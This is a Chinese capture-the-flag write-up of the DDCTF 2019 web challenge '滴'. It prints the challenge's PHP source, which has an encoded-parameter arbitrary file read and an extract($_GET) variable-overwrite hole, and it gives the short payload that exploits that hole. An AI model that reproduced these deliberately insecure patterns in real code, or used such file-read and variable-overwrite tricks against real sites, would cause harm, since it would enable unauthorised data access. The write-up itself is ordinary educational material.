DDCTFWEB.滴
2019-04-16 本文已影响13人
kepler404
首先观察这个,是经过2次base64和一次16进制得到flag.jpg
然后想,index.php也先16进制,然后2次base64, 看源码, 拿去解密,得到
<?php
/*
* https://blog.csdn.net/FengBanLiuYun/article/details/80616607
* Date: July 4,2018
*/
error_reporting(E_ALL || ~E_NOTICE);
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
$file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
echo '<title>'.$_GET['jpg'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
$file = str_replace("config","!", $file);
echo $file.'</br>';
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
* Can you find the flag file?
*
*/
?>
看到出题人博客,就想社工一下
根据这个提示,找到哪天的博客
这里是出题人打开的时候自动生成的文件,可能有敏感信息 发现 这里存在问题 通过题目提示,现在要获取f1ag!ddctf的源码 得到源码<?php
include('config.php');
$k = 'hello';
extract($_GET);
if(isset($uid))
{
$content=trim(file_get_contents($k));
if($uid==$content)
{
echo $flag;
}
else
{
echo'hello';
}
}
?>
可以构造poc
?uid=&k=